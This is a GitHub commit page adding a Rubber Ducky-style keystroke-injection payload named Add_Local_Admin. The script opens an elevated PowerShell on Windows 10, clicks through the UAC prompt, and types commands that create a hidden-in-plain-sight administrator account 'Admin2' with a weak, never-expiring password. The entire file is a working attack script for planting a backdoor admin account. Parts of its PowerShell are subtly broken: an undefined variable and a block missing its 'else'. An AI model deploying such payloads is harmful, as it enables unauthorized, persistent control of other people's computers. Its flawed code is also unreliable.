Create payload.txt

pull/103/head
LulzAnarchyAnon 2022-07-03 09:19:55 -07:00 committed by GitHub
parent 78fe574c2d
commit 2e77698801
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 72 additions and 0 deletions

View File

@ -0,0 +1,72 @@
REM Title: Add_Local_Admin
REM Author: LulzAnarchyAnon
REM Description: PowerShell is opened, and a script
REM runs that adds a Local Admin User.
REM Target: Windows 10 PowerShell
REM Props: Darren Kitchen, and I am Jakoby
REM Version: 1.0
REM Category: Execution
DELAY 2000
GUI x
DELAY 1000
a
DELAY 1000
ALT y
DELAY 1000
ALT TAB
DELAY 3000
STRING $Username = "Admin2"
DELAY 5000
ENTER
STRING $Password = "password"
DELAY 5000
ENTER
STRING $group = "Administrators"
DELAY 5000
ENTER
STRING $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
DELAY 5000
ENTER
STRING if ($existing -eq $null) {
DELAY 5000
ENTER
STRING Write-Host "Creating new local user $Username."
DELAY 5000
ENTER
STRING & NET USER $Username $Password /add /y /expires:never
DELAY 5000
ENTER
STRING Write-Host "Adding local user $Username to $group."
DELAY 5000
ENTER
STRING & NET LOCALGROUP $group $Username /add
DELAY 5000
ENTER
STRING }
DELAY 2000
ENTER
STRING {
DELAY 2000
ENTER
STRING Write-Host "Setting password for existing local user $Username."
DELAY 5000
ENTER
STRING $existing.SetPassword($Password)
DELAY 5000
ENTER
STRING }
DELAY 2000
ENTER
STRING Write-Host "Ensuring password for $Username never expires."
DELAY 5000
ENTER
STRING & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
DELAY 5000
ENTER
DELAY 2000
STRING exit
DELAY 100
ENTER
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"